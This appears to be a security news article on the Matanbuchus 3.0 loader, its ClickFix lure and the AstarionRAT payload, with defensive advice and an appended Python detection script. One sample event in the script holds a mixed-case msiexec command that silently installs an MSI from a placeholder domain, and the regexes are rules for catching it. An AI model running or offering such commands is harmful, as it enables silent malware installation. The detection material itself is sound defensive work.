Matanbuchus 3.0 reentered the cybersecurity landscape in February 2026 after a lengthy absence. This latest version, fully rewritten, commands a steep subscription fee of $15,000 per month, which points to a shift toward high-value, targeted operations rather than broad spam campaigns.
ClickFix Social Engineering
The malware employs the ‘ClickFix’ social engineering tactic, misleading users into executing harmful commands by presenting them as solutions to fictitious browser errors or software updates. This approach circumvents traditional security measures by exploiting trust rather than software vulnerabilities.
Victims receive deceptive prompts urging them to copy and paste specific commands into PowerShell or the Run dialog. The URLs used contain backslashes and path traversal sequences that confuse logging systems. Because the user launches the process themselves, many standard defenses are bypassed, and the installation proceeds silently without any visible interface.
AstarionRAT Delivery
Security analysts at Huntress have identified that Matanbuchus 3.0’s campaign delivers a novel payload known as AstarionRAT post-infection. This remote access trojan boasts 24 commands, including credential theft and SOCKS5 proxying, allowing operators to quickly move laterally within networks to target domain controllers, often with the intent of deploying ransomware or stealing data.
The infection mechanism is sophisticated, beginning with a mixed-case msiexec command fetching a payload from a newly registered domain. A legitimate yet vulnerable antivirus binary is then deployed alongside a malicious DLL in directories mimicking reputable vendors, further complicating detection.
Evading Detection
To obscure its actions, the malware uses a renamed version of 7-Zip to extract password-protected archives containing subsequent components. The malicious DLL, side-loaded by the antivirus engine, decrypts the Matanbuchus loader, launching an embedded Lua interpreter that executes the final AstarionRAT payload directly into memory, minimizing forensic traces.
Security teams are advised to configure endpoint detection systems to flag msiexec commands with mixed-case characters or suspect URLs. Monitoring for unusual directories in %APPDATA% and verifying connections to recently registered domains are also crucial. Employee training to avoid pasting raw commands into terminals is essential as well.
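As an added example, not code from the article or from Huntress, the detection heuristics above applied in Python to constructed process-creation events; the field names, hostnames and paths are placeholders, and the "recently registered domain" check is left to an external enrichment step:

```python
import re
from typing import Dict, List

# Constructed sample events (not from the article); fields mirror what a
# typical EDR or Sysmon process-creation record carries.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"MsIeXeC /i http://placeholder-newdomain.invalid/update.msi /qn"},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i C:\Installers\corp-app.msi /qn"},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i https://placeholder.invalid/\..\pkg.msi /q"},
    {"image": r"C:\Users\alice\AppData\Roaming\VendorLookalike\engine.exe",
     "cmdline": r"engine.exe"},
]

MSIEXEC_TOKEN = re.compile(r"(?i)\b(msiexec(?:\.exe)?)\b")
URL_ARG = re.compile(r"(?i)https?:\S+")
APPDATA_IMAGE = re.compile(r"(?i)\\AppData\\Roaming\\")

def mixed_case(token: str) -> bool:
    """True when the msiexec token is neither all-lower, all-upper nor Capitalized."""
    base = token.split(".")[0]
    return base not in (base.lower(), base.upper(), base.capitalize())

def suspect_url(url: str) -> bool:
    """Backslashes or dot-dot segments inside a URL, the log-confusing form described above."""
    return "\\" in url or ".." in url

def analyze(event: Dict[str, str]) -> List[str]:
    """Return the names of the indicators that fire for one event, in check order."""
    hits: List[str] = []
    if APPDATA_IMAGE.search(event["image"]):
        hits.append("image_in_appdata")          # executable living under %APPDATA%
    cmd = event["cmdline"]
    token = MSIEXEC_TOKEN.search(cmd)
    if token:
        if mixed_case(token.group(1)):
            hits.append("mixed_case_msiexec")
        for url in URL_ARG.findall(cmd):
            hits.append("remote_msi_install")    # candidate for domain-age enrichment
            if suspect_url(url):
                hits.append("traversal_or_backslash_in_url")
    return hits

def triage(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map event index to its indicator list, keeping only events that fired."""
    return {i: analyze(e) for i, e in enumerate(events) if analyze(e)}
```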
